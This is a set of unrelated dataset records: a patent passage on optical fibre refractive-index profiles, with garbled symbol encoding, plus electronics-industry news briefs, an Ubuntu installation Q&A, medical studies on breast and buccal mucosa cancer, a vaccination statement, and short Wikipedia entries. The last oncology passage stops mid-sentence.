0.8%xe2x89xa6xcex94n1xe2x89xa61.2%xe2x80x83xe2x80x83(2) 0.12%xe2x89xa6xcex94n2xe2x89xa60.30%xe2x80x83xe2x80x83(3) xcex94n3/xcex94n2xe2x89xa60.95xe2x80x83xe2x80x83(4) wherein xcex94n1 is a relative refractive index difference of the inner core with respect to the inner cladding, xcex94n2 is a relative refractive index difference of the outer core with respect to the inner cladding, and xcex94n3 is a relative refractive index difference of the outer cladding with respect to the inner cladding. The dispersion-shifted fiber satisfying these relationships can favorably realize the foregoing various characteristics, and allows its absolute value of dispersion slope to become at least 0.09 ps/nm2/km but not larger than 0.13 ps/nm2/km. Here, the relative refractive index difference xcex94n1 of the inner core with respect to the inner cladding, relative refractive index difference xcex94n2 of the outer core with respect to the inner cladding, and relative refractive index difference xcex94n3 of the outer cladding with respect to the inner cladding are respectively defined as follows: xcex94n1=(n12xe2x88x92n32)/(2n12)xe2x80x83xe2x80x83(5) xcex94n2=(n22xe2x88x92n32)/(2n22)xe2x80x83xe2x80x83(6) xcex94n3=(n42xe2x88x92n32)/(2n42)xe2x80x83xe2x80x83(7) wherein n1 is the refractive index of the inner core, n2 is the refractive index of the outer core, n3 is the refractive index of the inner cladding, and n4 is the refractive index of the outer cladding. In this specification, each relative refractive index difference is expressed in terms of percentage. Preferably, the first embodiment of the dispersion-shifted fiber further satisfies the following relationship: 1.2xe2x89xa6c/bxe2x89xa63.5xe2x80x83xe2x80x83(8) wherein 2c is an outside diameter of the inner cladding. The above relationship is preferable in view of the fact that, in the first embodiment of the dispersion-shifted fiber, the bending-loss-reducing effect, which is generated by the existence of the inner cladding, can not sufficiently be yielded when the inner cladding is too thin. On the other hand, when the inner cladding is too thick, it functions in a way similar to a normal cladding and fails to yield the cutoff-wavelength-shortening effect of the depressed cladding type refractive index. When the dispersion-shifted fiber satisfies the relationship of c/bxe2x89xa71.2, the bending loss in the case where it is bent at a diameter of 32 mm can become 0.5 dB/turn or less. On the other hand, as the first embodiment of the dispersion-shifted fiber satisfies the relationship of c/bxe2x89xa63.5, its cutoff wavelength can favorably be made shorter, thereby making it easy to secure a wavelength range of signal light which allows single-mode transmission. Next, a second embodiment of the dispersion-shifted fiber according to the present invention has a depressed cladding/segmented-core type refractive index profile. The second embodiment of the dispersion-shifted fiber comprises an inner core having a predetermined refractive index and an outside diameter of 2a; an intermediate core, disposed around the outer periphery of the inner core, having a refractive index lower than that of the inner core and an outside diameter of 2b; an outer core, disposed around the outer periphery of the intermediate core, having a refractive index higher than that of the intermediate core and an outside diameter of 2c; an inner cladding, disposed around the outer periphery of the outer core, having a refractive index lower than that of the outer core; and an outer cladding, disposed around the outer periphery of the inner cladding, having a refractive index higher than that of the inner cladding. Preferably, the second embodiment of the dispersion-shifted fiber satisfies the following relationships: a/cxe2x89xa60.42xe2x80x83xe2x80x83(9) b/cxe2x89xa70.60xe2x80x83xe2x80x83(10) 0.5%xe2x89xa6xcex94n1xe2x89xa61.1%xe2x80x83xe2x80x83(11) 0.2%xe2x89xa6xcex94n3xe2x88x92xcex94n2xe2x89xa60.7%xe2x80x83xe2x80x83(12) xcex94n4/xcex94n3xe2x89xa60.95xe2x80x83xe2x80x83(13) wherein xcex94n1 is a relative refractive index difference of said inner core with respect to said inner cladding, xcex94n2 is a relative refractive index difference of said intermediate core with respect to said inner cladding, xcex94n3 is a relative refractive index difference of said outer core with respect to said inner cladding, and xcex94n4 is a relative refractive index difference of said outer cladding with respect to said inner cladding. The above-relationships (9) and (10) are conditions to satisfy the effective core cross-section area Aeff of 70 xcexcm2. The relative refractive index difference xcex94n1 of said inner core with respect to said inner cladding is preferably 0.5% or more in order to satisfy the condition that the dispersion level in terms of absolute value falls within 1.0 to 4.5 ps/nm/km. Further, when the relative index difference xcex94n1 is 1.1% or less, the dispersion slope at wavelength of 1,550 nm falls within a range of 0.09 to 0.13 ps/nm2/km. The value (xcex94n3xe2x88x92xcex94n2 ) should be 0.2% or more in order to satisfy the condition that the bending loss when bent at a diaimeter of 32 mm becomes 0.5 dB/turn or less, and it should be 0.7% or less in order to make cutoff wavelength at a length of 2 m set 2.2 xcexcm or less. The relationship (13) is a condition to restrain the transmission loss with respect to light in a 1.55-xcexcm wavelength band so as not to exceed 0.25 dB/km. Further, the second embodiment of the dispersion-shifted fiber satisfies the following relationship: 1.2xe2x89xa6d/cxe2x89xa63.5xe2x80x83xe2x80x83(14) wherein 2d is an outside diameter of the inner cladding. The bending loss when bent at a diameter of 32 mm becomes 0.5 dB/km or less when (d/c) is not less than 1.2, and the reducing effect of the cut off wavelength becomes saturated when (d/c) exceeds 3.5. The present invention will be more fully understood from the detailed description given hereinbelow and the accompanying drawings, which are given by way of illustration only and are not to be considered as limiting the present invention. Further scope of applicability of the present invention will become apparent from the detailed description given hereinafter. However, it should be understood that the detailed description and specific examples, while indicating preferred embodiments of the invention, are given by way of illustration only, since various changes and modifications within the spirit and scope of the invention will be apparent to those skilled in the art from this detailed description.
{ "pile_set_name": "USPTO Backgrounds" }
Elgin, IL — At a ceremony in Munich, Germany, HARTING was given an "Innovator of the Year" award by trade magazine DESIGN&ELEKTRONIK. The award was presented in recognition of HARTING's ix Industrial® connector. The connector was developed by HARTING, in partnership with Japan's HIROSE technology ... Elgin, IL — HELUKABEL® USA has broken ground for its new U.S. headquarters. The eight acre property is located in the Chicago suburb of West Dundee. The initial structure will be a 75,000 ft2 (6,968m2) facility, with 7,000 ft2 (650m2) allotted for office space and the rest ... West Conshohocken, PA — Heraeus Electronics has signed a global licensing agreement with Mozaik Technology Ventures, a manufacturer of fine thick-film technology. Under the terms of the agreement, Heraeus Electronics will license a broad range of Mozaik's photoimageable thick-film paste technology. The partnership ... St. Petersburg, FL — Jabil is now supporting Baicells by manufacturing the company's 10W mini-cell base station, an LTE wireless broadband access device. Under the agreement, Jabil will provide manufacturing services to sites in the U.S., China, Southeast Asia, Brazil, and Europe. At the same time, Baicells ... Milpitas, CA — Lenthor Engineering, a manufacturer and assembler of rigid-flex and flex PCBs has released its Q3 2017 financial results. Total revenue came in two percent higher than Q3 2016. Profit levels remained steady throughout the year, with an expectation that they will be higher overall than in 2016 ... Rowley, MA — Mycronic will include Aegis Software's FactoryLogix NPI as the main programming interface for its MY700 jet printer and jet dispenser. The customized software, branded FactoryLogix Express, will also have the capability to prepare data for Mycronic's range of pick-and-place machines, through an ... Rolling Meadows, IL — Panasonic has won a "Global Technology" award from Global SMT and Packaging for its new NPM-W2S component placement system. The award was given at productronica in November. The NPM-W2S is the next platform in the company's NPM series and is designed for manufacturers who value ... Manchester, NH — Schleuniger Group has signed an agreement to acquire 60 percent of adaptronic Prüftechnik GmbH, based in Wertheim, Germany. The transaction is expected to be concluded early this year. A manufacturer of wiring test systems and functional test systems, adaptronic has around 140 ... Parsippany, NJ — Sun Chemical has acquired the assets and business of Transitions Digital Graphics, LLC. Based in Santa Barbara, California, Transitions Digital Graphics develops changeable advertising signage and displays that use invisible ink. Sun Chemical, a member of the DIC Group, is a producer of printing ... Dallas, TX — As part of a commitment to the greater Dallas/Fort Worth community, CalcuQuote is sponsoring an after-school program. It is operated by Dallas-based STEM education company Tech EdVentures and held at Weatherford Elementary School in Plano, Texas. The program will introduce students to principles ... Seoul, South Korea — Koh Young Technology has been recognized as an honoree in the 2016 Total Cost of Ownership (TCOO™) Supplier Award program from Celestica. Celestica's TCOO Supplier Award program evaluates and recognizes the top performers in the company's global network of more than 4,000 suppliers ... Elgin, IL — HARTING has partnered with North Central College to open a dedicated electronics laboratory. Located in Naperville, Illinois, the lab is designed to introduce basic electronic methods and applications to the college's students. The company is also donating equipment and products to the ... Fremont, CA — Juki Automation Systems has presented Quantum Systems with the award for "Representative of the Year - Best Performance." Bill Astle, president of Juki Americas, presented the award to Bill Butt, Quantum Systems' principal, at a recent awards banquet held during Juki Americas' national ... Haverhill, MA — Seica has relocated its North American headquarters from Salem, New Hampshire, to Haverhill, Massachusetts. The new 16,000 ft2 (1.486m2) facility is located on 3.5 acres (1.4 hectares) of land. The facility offers a demonstration area, as well as a dedicated and controlled ... Cypress, CA — Techcon has unveiled a new logo and brand identity along with a series of innovative new products. The products include the TS550R smart valve controller, which can remotely control the Techcon pneumatic valve series from a mobile device or PC, or by a touchscreen interface. The company's new ...
{ "pile_set_name": "Pile-CC" }
Here is the original which was done by Andre Derain, summer 1905. The picture is of Mattisse and his wife. It was done on ink on paper. When I was in art school learning about ink drawing, I chose this picture to work on learning about how the strokes where made. Below is my attempt to copying this picture. I saw that proportion is an area that needs work. This was a great exercise of learning how to draw with ink and drawing. It was not that easy but I am willing to try this again with other master artists.
{ "pile_set_name": "Pile-CC" }
Q: How do I install 10.04 on a Vortex86DX embdedded system? I am trying to install Ubuntu on a Netcom NC-499 board that contains a Vortex86DX processor. The processor vendor claims support for Ubuntu 10.04 but I am having problems installing it. I am trying to install to a 8GB compact flash card attached to the board with an IDE connector, using a USB connection CD-Rom drive and a burned ISO image obtained from this link http://old-releases.ubuntu.com/releases/10.04.0/ubuntu-10.04.3-desktop-i386.iso . Installation proceeds up to the point of around 78% but during the stage where the installer informs me that it is "configuring apt", the installer terminates with a popup dialog containing the following "The installer encountered an unrecoverable error. A desktop session will now be run so that you may investigate the problem or try installing again." I have no idea what to do at this point. I am a Linux novice and I do not really know how to investigate the problems with the installation. I have configured the BIOS exactly according to how the vendor specifies and they assure me that this version is fully compatible with their hardware and yet I am unable to get a decent install. I am able to install Ubuntu 8.04 using exactly the same procedure successfully so I am sure there is no problem with my CD-Rom compatibility or the compact flash drive. Any help will be gratefully received. A: Just in case anyone ever tries to do this and has the same problems, the accepted answer to my other question Installing g++ on 8.04 enabled me to get 10.04 onto this board by first installing 8.04 and then upgrading to 10.04 using the distribution server given in that answer.
{ "pile_set_name": "StackExchange" }
1. Introduction =============== The worldwide incidence of breast cancer in young patients shows an obvious upward trend in recent years. Based on the data of Surveillance, Epidemiology, and End Results, approximately 11% of breast cancer patients are 35 to 45 years old.^\[[@R1]\]^ The Asian population has a significantly higher proportion of young patients with breast cancer than the Western population, and 9.5% to 12% of all patients with breast cancer in Asia are within this young age range.^\[[@R2]\]^ Recently, the rate of breast cancer diagnosis has rapidly increased in young women in China, and the mortality rate among these young patients is higher than among those who are older. Statistics released by the International Agency for Research on Cancer have shown that patients younger than 40 years accounted for 12.56% of all cancer diagnoses in China in 2008.^\[[@R3]\]^ According to statistics of the Shanghai Center for Disease Control and Prevention, patients \<40 years old accounted for 10% to 20% of the total cases of breast cancer in Shanghai from 1990 to 2007.^\[[@R4]\]^ The poor prognosis of early onset breast cancer has gradually attracted widespread international concern in recent years.^\[[@R3],[@R5]\]^ Some countries with a high incidence of breast cancer have made significant progress identifying risk factors for breast cancer that are specific to certain regions and certain populations, which allows doctors to collect relevant information to quantitatively predict the risk of breast cancer for an individual woman.^\[[@R6]\]^ Case--control studies from different regions of China have shown that the risk factors for breast cancer are mainly biological (age at menarche, duration of breast-feeding, menopausal status, and history of contraceptive drug use), psychological (mental stress, depression, negative life events, and long-term depression), and social (passive smoking and residential environmental pollution) factors. Yan et al^\[[@R7]\]^ conducted a meta-analysis of nearly 10 years of Chinese literature to elucidate the relationship between psychological factors and breast cancer and showed that the development of breast cancer is the consequence of the integrated effect of multiple factors including biological, psychological, and social factors. Currently, research on risk factors for early onset breast cancer in China is lacking. Given the gradual increase in the incidence of early onset breast cancer, research investigating the lifestyle and status of young patients prior to disease onset is being performed to identify factors associated with early onset breast cancer. This study aimed to investigate the main physiological and psychological risk factors for breast cancer in young patients based on the biopsychosocial medical model and to explore the impact of lifestyle and psychological stress on the development of early onset breast cancer, thereby providing a basis for the development of relevant prevention strategies. 2. Materials and methods ======================== 2.1. Ethical approval --------------------- The present study was approved by the Scientific and Ethical Committee of the Shanghai Cancer Center, Fudan University. Written informed consent was obtained from all participants. The individuals in the present study have given written informed consent to publish these details and data. 2.2. Study population and data collection ----------------------------------------- The present study took place in 1 cancer center in Shanghai between May 2013 and May 2015. Based on a convenient sampling strategy (nonprobability sampling), participants were screened and selected by the principal researcher according to inclusion and exclusion criteria. Patients younger than 40 years of age who had breast disease and who were admitted to the Department of Breast Surgery at Shanghai Cancer Center of Fudan University were included in this study. The patient group consisted of breast cancer patients, while the control group consisted of patients with benign breast disease. For the patient group, the inclusion criteria were as follows: pathological diagnosis of breast cancer, elementary education or higher, ≤40 years old, no past or current mental illness or unconsciousness, and agreement to participate in the study. The exclusion criteria were as follows: systemic metastasis and presence of arthritis, severe cardiovascular disease, diabetes, or brain dysfunction. For the control group (the control cases in the hospital), the inclusion criteria were as follows: agreement and ability to participate in the survey, elementary education or higher, ≤40 years old, no past or current mental illness or unconsciousness, and pathological diagnosis of benign breast disease. The exclusion criterion was as follows: presence of arthritis, severe cardiovascular disease, diabetes, or brain dysfunction. Eligible women were identified and approached by the researchers in our department. Then the researchers would explain details of the study to each patient, and ask for each patient\'s informed consent to participate in the study. If consent was given, the researchers would distribute the questionnaires to them and notify them that the questionnaires aimed to investigate the status of the patients before they were ill. 2.3. Study methods ------------------ The present case--control study was designed to collect data regarding risk factors associated with early onset breast cancer and explored the impact of lifestyle and psychological stress on the development of early onset breast cancer. According to Professor Engel\'s biopsychosocial model of modern medicine, which attributes the cause of a disease to integrated factors beyond a single biological agent and highlights the impact of psychological and social factors on human health,^\[[@R8]\]^ a self-designed structured questionnaire (Supplemental file) was used to obtain information from cases and controls covering demographic factors, female reproductive factors, lifestyle factors, and psychological factors. The demographic factors had 7 items and the female reproductive factors contained 9 items. The lifestyle factors contained 22 items covering 3 dimensions wherein smoking and drinking contained 6 items, living and working habits contained 11 items, and dining contained 5 items. The psychological factors were investigated by the "Psychosocial Stress Survey for Groups (PSSG)" questionnaire and 13 normal psychological items designed through literature and clinical experience. The " PSSG" is based on Folkman\'s stress theory^\[[@R9]\]^ and has been applied to the researches of the pathogenesis of tumor, insomnia and such physical and psychological illness. PSSG contained up to 44 items of 3 assessment levels including life events, emotional experience, and responses to living occurrences and moods. Life events contained such items as death of spouse/relatives, marriage problems (divorce/separation), changes in occupations, financial difficulty, and changes in personal health. Emotional experience contained negative emotion and positive emotion. Negative emotion included fear, worries, depression, nervousness, sorrow, helplessness, etc. Positive emotion included delightfulness, happiness, excitement, etc. Reponses to living occurrences and moods contained positive coping and negative coping. Positive coping included forgetting unhappy things as soon as possible, transferring negative factors into positive factors quickly, trying to find help, changing a different environment, being humorous to any problems, etc. Negative coping included being angry at others, losing temper, always crying, always drinking and smoking, etc. PSSG were believed to have good reliability and validity.^\[[@R10]\]^ Seventeen medical information items were collected by researchers including height, weight, age of menarche, menopause, first birth, family history, etc. 2.4. Data analysis ------------------ The data were input into SPSS 18.0 software. The indices in questionnaire were compared between the 2 groups using *t* tests (nonpaired, 2-tailed with equal variance) and χ^2^ tests. Unconditional logistic regression model was used to analyze the significant risk factors of early onset breast cancer. Correlation power of all risk factors with breast cancer was evaluated by the odds ratio. The odds ratio represented the odds that an outcome would occur given a particular exposure, compared to the odds of the outcome occurring in the absence of that exposure. 3. Results ========== We contacted 891 young women in the patient group. A total of 582 patients consented and completed the questionnaire (65% acceptance). The most common reason for refusal provided was "not interested in it." The majority (46%) did not provide a reason. Comparisons were made between 540 patients (60% acceptance) and the 362 refusers with regard to available data. The majority of the control group (51%) did not provide a reason. So from May 2013 to May 2015, a total of 582 patients who were ≤40 years old and who had breast cancer and 540 patients who were ≤40 years old and who had benign breast disease were included in this study. Comparison of the demographic factors, reproductive factors, and lifestyle and psychological factors between the patient group and the control group is presented in Table [1](#T1){ref-type="table"}. The mean age of patients was 34.51 ± 4.61 years, and the mean age of controls was 30.51 ± 6.65 years. The comparison of the 2 groups showed no statistically significant difference in the age at menarche, the number of abortions, the number of live births, regular menstruation, breast symptoms, alcohol drinking, tea drinking, coffee drinking, daily activities, sleeping time, duration of computer use, work intensity, household food expenses and intake of various types of food (meat, seafood, eggs, mushrooms, whole grains, vegetables, fruits, milk, pickled foods, and fried foods), use of health supplements (except fungus spore powder), household drinking water, and interpersonal relationships (all *P* \> 0.05). ###### Comparison of the baseline, reproductive factors, and lifestyle and psychological factors between the patient group and the control group. ![](md-95-e5529-g001) The results of unconditional logistic regression showed that age at first birth, history of breast cancer in an immediate family member, history of genital surgery, frequent active and passive smoking in daily life or at work, weekly consumption of soy products, use of animal oil for cooking, marital disharmony, frequent depression, and negative emotional experiences were significantly associated with early onset breast cancer (*P* \< 0.05) (Table [2](#T2){ref-type="table"}). Women who were of a low age at the first birth had 7% lower risk of developing breast cancer than those who were of a higher age at the first birth. Increased risks were attributed to a family history of breast cancer (95% confidence interval \[CI\]: 1.14--4.89) and a history of genital surgery (95% CI: 1.16--3.82). In addition, exposure to passive smoking in daily life (95% CI: 1.19--2.25), a high weekly consumption of soy products (95% CI: 1.02--1.49), and a high intake of animal oils for household cooking (95% CI: 1.04--4.00) were also associated with an increased risk of breast cancer. With regards to psychological factors, the associations were also found for disharmonious marital status (95% CI: 1.06--1.26), depression (95% CI: 1.00--1.75), and negative emotional experiences (95% CI: 1.03--1.29) with increased breast cancer risk. ###### Unconditional logistic regression analysis of the correlation between risk factors. ![](md-95-e5529-g002) 4. Discussion ============= The present study is a case--control study of the risk factors associated with early onset breast cancer in China. The logistic regression analysis in the present study showed that the risk of breast cancer in a young woman with a history of breast cancer in an immediate family member was 2.36 times that of a young woman with a negative family history. This finding is consistent with the study of Kilfoy et al.^\[[@R11]\]^ Their cohort study in Shanghai showed that the risk of breast cancer in a woman with a history of breast cancer in an immediate family member was 1.74 times that of a woman with a negative family history, which was more significant for women ≤55 years of age. For young women, they should clearly know about their family history and be aware of their increased risk; then they could pay more attention to their health examination. And health professionals could provide these young women with related specialized information. Epidemiological studies have indicated that the history of reproductive disease increases the risk of breast cancer to varying degrees. The study by Schairer et al^\[[@R12]\]^ showed that those who underwent a hysterectomy alone were at a slightly increased risk of breast cancer. Studies by Cao et al^\[[@R13]\]^ and Ju et al^\[[@R14]\]^ also showed a positive correlation between a history of genital surgery and the incidence of breast cancer. The development of breast diseases is related to estrogen, and estrogen is closely related to breast cancer. Some ovarian diseases can cause abnormal secretion of estrogen.^\[[@R13]\]^ The instability of reproductive factors may be a complex research problem encountered in the study of risk factors for breast cancer. Therefore, regular screening should be provided for young women with a history of genital surgery, and they should be made aware of their increased risk. The harm to human health caused by smoking is indisputable. Although the rate of active smoking in Chinese women is not high, they are frequently exposed to passive smoking, which is also known as "environmental second-hand smoke."^\[[@R15]\]^ Studies have confirmed that secondhand smoke is harmful as soon as it is inhaled, and, thus, there is no safe exposure level.^\[[@R16]\]^ Canadian scholars have inferred the causal relationships between passive smoke exposure in nonsmoking young women and the development of breast cancer.^\[[@R17]\]^ Chen et al^\[[@R18]\]^ performed a meta-analysis of passive smoking among Chinese women and found a risk ratio for breast cancer of 1.67 (95% CI: 1.27--2.21) among women exposed to passive smoke. Our study also confirmed that frequent smoke exposure in daily life or at work increased a young woman\'s risk of breast cancer by 1.64 (95% CI: 1.19--2.25). As a preventable and controllable environmental risk factor, smoking has an important significance for the prevention of early onset breast cancer. Young women should be aware of this environmental factor, try to reduce their exposure to this indirect hazard, and maximize their chances to work and live in good environments. Studies of soy intake and the risk of breast cancer, including the meta-analyses by Liu et al^\[[@R19]\]^ and Woo et al,^\[[@R20]\]^ have shown that the regular intake of soy products protects against breast cancer. However, our study of young women showed opposite results. Because there are few studies of breast cancer risk among young patients consuming soy products, the results of this single study may not be applicable to all young women in the population. A prospective study would be a better experimental design to explore the correlation between breast cancer and consumption of soy products. Our study also found that using animal fat as a household cooking oil has a risk ratio for breast cancer of 2.04 (95% CI: 1.04--4.00). Animal oil contains more saturated fatty acids and cholesterol. Vegetable oil is the fat obtained from the extraction of the seeds and other parts of plants. Dai et al^\[[@R21]\]^ carried a large population-based case--control study; they found that intake of soybean oil might reduce the risk of breast cancer among women. Vitamin E and phytosterols are the phytochemicals that have been proven to restrain the growth and metastasis of breast cancer in cell culture and animal experiments.^\[[@R22]\]^ Moreover, soybean oil has a high density of essential fatty acids including linoleic and linolenic acid (mostly α-linolenic). The epidemiological evidence from other countries shows that olive oil may reduce the risk of breast cancer.^\[[@R23],[@R24]\]^ Research indicates that the major fatty acid composition of olive oil, which is octadecenoic acid, can block the generation of a protein that may stimulate the growth of breast cancer cells. These findings suggest that cooking oil factor and its interaction with body mechanism may play an important role in the etiology of breast cancer. The results of our study may provide a reference for young women in China to choose a cooking oil. But large-scale experimental researches on cooking oil are still lacking; a prospective experimental study could be better designed to explore the correlation between breast cancer and cooking oil. Psychological factors, including depression and stress, impair immune function, which, in turn, predisposes an individual to the development of cancer^\[[@R25],[@R26]\]^; it may cause the body to activate human physiological systems in order to maintain stability.^\[[@R27]\]^ Gross et al^\[[@R28]\]^ followed subjects for 24 years to study the relationship between emotions and cancer, and the results showed a statistically significant difference in depression for women with breast cancer, and the level of anxiety also significantly increased the risk of breast cancer. A review by Butow et al^\[[@R29]\]^ found that some case--control studies had shown that emotional depression and alexithymia are strong predictors for the risk of breast cancer in young women. Possel et al^\[[@R30]\]^ also conducted a review focusing on the relationship between depression and the development of breast cancer; 12 of the 15 studies found positive associations between them. Few relevant studies from China are available. A survey by Wang et al^\[[@R31]\]^ of personality traits among breast cancer patients in Southwest China showed an unstable character among patients prior to the diagnosis, which mainly presented as depression, emotion repression, pessimism, and quick anger after stimulation. Our study showed that frequent depression and negative emotional experiences were associated with the development of early onset breast cancer, with risk ratios of 1.32 (95% CI: 1.00--1.75) and 1.15 (95% CI: 1.03--1.29), respectively, which are consistent with the finding that emotional repression increases the risk of breast cancer. The balance of neuroendocrine hormones in women is easily affected by psychological trauma, and long-term adverse emotional experiences may cause hyperplasia in mammary epithelial cells that leads to the development of cancer.^\[[@R32]\]^ Fast-paced urban life and social pressures push young women to pursue quick success without rest, which puts the body into a long-term stressed state that results in exhaustion, physical discomfort, mental depression, lowered self-regulation, and suppression of the body\'s immunity and endocrine balance. All of these elements may reduce the body\'s resistance to cancer-causing factors or enhance the body\'s susceptibility and, thus, may increase the risk of breast cancer. The 10-year follow-up survey of 18,932 women by Nielsen et al^\[[@R33]\]^ found that women working in fast-paced jobs had a higher risk of breast cancer than women working at a proper pace. The correlation of mental state and emotional experiences with breast cancer should draw more attention to young women. Young women should adjust their pace, relax, decompress, and experience positive emotions, which will improve their quality of life and reduce their possibility of illness. Negative life events and stressful events play an important role in the development of breast cancer.^\[[@R34],[@R35]\]^ A prospective study by Michael et al^\[[@R36]\]^ followed 84,334 women over a period of 7.6 years and found an increased risk of breast cancer among women reporting a negative life event compared to that among women without such an event. Specifically, negative events such as divorce/separation, death of a spouse, and bereavement showed the largest impacts. It is believed that the pathogenesis may be related to hormones or other mechanisms. A case--control study by Eskelinen and Ollonen^\[[@R37]\]^ showed that the score of negative life events and the level of personal pressure among breast cancer patients were significantly different from those who were healthy or had benign disease. Our study showed that the scores of negative life events for the young women in the 2 groups were significantly different, but only marital disharmony was identified in the logistic regression as being a risk factor, with a risk ratio of 1.16 (95% CI: 1.06--1.26). This is consistent with the results of previous studies, which also indicate that harmonious marriage is an important protective factor among young women. A good and stable marriage can promote human health and protect young women by improving their ability to deal with and adapt to life events,^\[[@R38]\]^ and a high-quality marriage requires joint efforts from both partners, so maintaining a harmonious marriage should be a priority. In summary, in the present case--control study, we found that besides age at first birth, history of breast cancer in an immediate family member, and history of genital surgery, lifestyle and psychological factors play an important role in the risk of breast cancer among young women. The present study was one of the few case--control studies of early onset breast cancer in China. It clarified the relationship of lifestyle factors and psychological factors with early onset breast cancer and indicated the importance of psychological factors in the prevention of early onset breast cancer. 4.1. Study limitation --------------------- The limitations of the present study include the recruitment and the convenient sample from 1 cancer center. And the numbers between case and control groups do not catch 1:1 match. Maybe they do not represent the majority of young breast cancer patients. Multiple testing can lead to significant findings due to chance. Acknowledgments =============== The authors would like to thank the women who participated in this research and shared their experiences. They would also like to thank Professor Jiayan Huang (Professor of Impact Evaluation & Health Service, School of Public Health, Fudan University) for her suggestions on the present study. Supplementary Material ====================== ###### Supplemental Digital Content Abbreviations: CI = confidence interval, OR = odds ratio, PSSG = Psychosocial Stress Survey for Groups. The authors have no conflicts of interest to disclose. Supplemental Digital Content is available for this article.
{ "pile_set_name": "PubMed Central" }
The DADD Board of Directors supports the American Academy of Pediatrics Recommended Immunization Schedule for Persons Aged 0 through 18 years of age. Over two dozen epidemiological studies failed to identify a causal relationship between vaccinations and autism. The initial research that suggested such a relationship has been discredited. We recommend all families discuss vaccinations with their family health care provider on how best to maintain the health and safety of their child and those who cannot be immunized due to medical reasons.
{ "pile_set_name": "Pile-CC" }
Anna Bornhoff Anna Bornhoff (born 17 November 1981 in Hamm) is a German football striker. She currently plays for 1. FFC Turbine Potsdam. Career Bornhoff began her career at the SG Sendenhorst. She then moved to the girls' team of SC Germania Stromberg. In 2000, she moved to the university in Bayreuth. She then played for SpVgg Bayreuth and FC Eintracht Münchberg. Bornhoff went to the second division side TSV Crailsheim in 2005. She became the team’s top scorer and won promotion to the Bundesliga. In 2007, she went to Berlin for a new job. She rejected offers from Tennis Borussia Berlin and newly promoted 1. FC Union Berlin and signed with 1. FFC Turbine Potsdam but cut her contract in late 2007 due to much work. External links Official homepage of 1. FFC Turbine Potsdam Category:1981 births Category:Living people Category:People from Hamm Category:German women's footballers Category:1. FFC Turbine Potsdam players Category:Women's association football forwards Category:Footballers from North Rhine-Westphalia
{ "pile_set_name": "Wikipedia (en)" }
Geranium maculatum Geranium maculatum, the wild geranium, spotted geranium, or wood geranium, is a perennial plant native to woodland in eastern North America, from southern Manitoba and southwestern Quebec south to Alabama and Georgia and west to Oklahoma and South Dakota. Names It is known as spotted cranesbill or wild cranesbill in Europe, but the wood cranesbill is another plant, the related G. sylvatium (a European native called "woodland geranium" in North America). Colloquial names are alum root, alum bloom and old maid's nightcap. Distribution It grows in dry to moist woods and is normally abundant when found. Description It is a perennial herbaceous plant growing to tall, producing upright, usually unbranched stems and flowers in spring to early summer. The leaves are palmately lobed with five or seven deeply cut lobes, broad, with a petiole up to long arising from the rootstock. They are deeply parted into three or five divisions, each of which is again cleft and toothed. The flowers are in diameter, with five rose-purple, pale or violet-purple (rarely white) petals and ten stamens. In the Northern Hemisphere, they appear from April to June (precise dates depend on the latitude). They are grouped in loose corymbs or umbels of two to five at the top of the flower stems. The fruit capsule, which springs open when ripe, consists of five cells each containing one seed joined to a long beak-like column long (resembling a crane's bill) produced from the center of the old flower. The rhizome is long, and thick, with numerous branches. It is covered with scars, showing the remains of stems of previous years' growth. When dry it has a somewhat purplish color internally. Cultivation The plant is well-known in cultivation, and numerous cultivars have been developed. The cultivar 'Elizabeth Ann' has gained the Royal Horticultural Society's Award of Garden Merit. Other uses The plant has been used in herbal medicine, and is also grown as a garden plant. Wild geranium is considered an astringent, a substance that causes contraction of the tissues and stops bleeding. The Mesquakie Indians brewed a root tea for toothache and for painful nerves and mashed the roots for treating hemorrhoids. Gallery References maculatum Category:Flora of North America Category:Plants used in traditional Native American medicine Category:Plants described in 1753
{ "pile_set_name": "Wikipedia (en)" }
1. Introduction {#sec1} =============== Oral cancer is uncommon in the West but far more prevalent in Asian countries like India and Taiwan where it is strongly associated with betel quid chewing \[[@B1]\]. Among all subsites, an alarming 30--40% of intraoral malignancies arise from buccal mucosa. Surgery followed by radiation remains the treatment of choice \[[@B2]\]. Tortuous anatomy of buccal space combined with the aggressive nature of this malignancy resists surgical attempts and results in poor prognosis in advanced cases. In treatment of locoregionally advanced head and neck cancer, chemoradiation (CRT) has shown superior results when compared with radiation (RT) alone \[[@B3]\]. Comparable results have been demonstrated with altered fractionation and conventional chemoradiation \[[@B4], [@B5]\]. Single agents like carboplatin and methotrexate have been added to hypofractionated radiation protocol demonstrating comparable results and acceptable toxicity \[[@B6], [@B7]\]. In developing countries with limited resources and large patient burden hypofractionation allows an efficient use of resources. We used hypofractionated radiation (55 Gy/2.75 Gy per day, completed in 20 days, administered 5 days a week) instead of the standard where 70 Gy is administered over 35 days, 5 days a week. Hypofractionation allowed a shortened stay and early return back home for patients who had affordability issues. In addition, it required 2 cycles of concurrent Cisplatin versus standard 3 cycles since radiation was completed before the third cycle was due. This potentially lowered chemotherapy related toxicity. The aim of current study was to report survival outcomes at 5 years of follow-up with hypofractionated radiation and concurrent single agent chemotherapy in the treatment of locally advanced BMSCC. 2. Methods {#sec2} ========== We retrospectively reviewed 63 patients who presented between February 2005 and February 2009 with locally advanced, histologically verified buccal mucosa squamous cell carcinoma (BMSCC) and were treated with curative intent at the head and neck clinic in Shaukat Khanum Memorial Cancer Hospital and Research Center. Patients included in this study had inoperable disease. Exclusion criteria included all the patients treated with radiation only, patients undergoing surgery as part of their treatment protocol, or patients presenting with metastatic disease at the time of presentation. Age ranged from 24 to 77 years (median 52 years). Pretreatment evaluation included clinical examination, MRI face and neck, chest X-rays, Orthopantomogram (OPG), complete blood profile, serum electrolytes, and liver and renal function tests. Tumors were staged in accordance with the guidelines set by the American Joint Committee on Cancer staging system (AJCC) 6th edition. All patients underwent pretreatment dental examination and those with signs of widespread and/or advance periodontitis had tooth extractions prior to the commencement of chemoradiotherapy (CRT). Patients with trismus and/or those undergoing chemotherapy were provided nutritional support via percutaneous endoscopic gastrostomy (PEG). 2.1. Induction Chemotherapy {#sec2.1} --------------------------- Induction chemotherapy was administered on outpatient basis. The indications for induction chemotherapy included bulky disease, inoperable disease (tumors in which gross clear margin was difficult to achieve), and tumors extending into submasseteric space. Regimen consisted of a combination of 2 drugs, intravenous Gemcitabine 1000 mg/m^2^ on day 1 and day 8 and Cisplatin 75 mg/m^2^ on day 1 of each cycle, respectively ([Figure 1](#fig1){ref-type="fig"}). A three-week interval was observed between the 2 cycles. Two weeks after completion of second cycle, a response assessment was 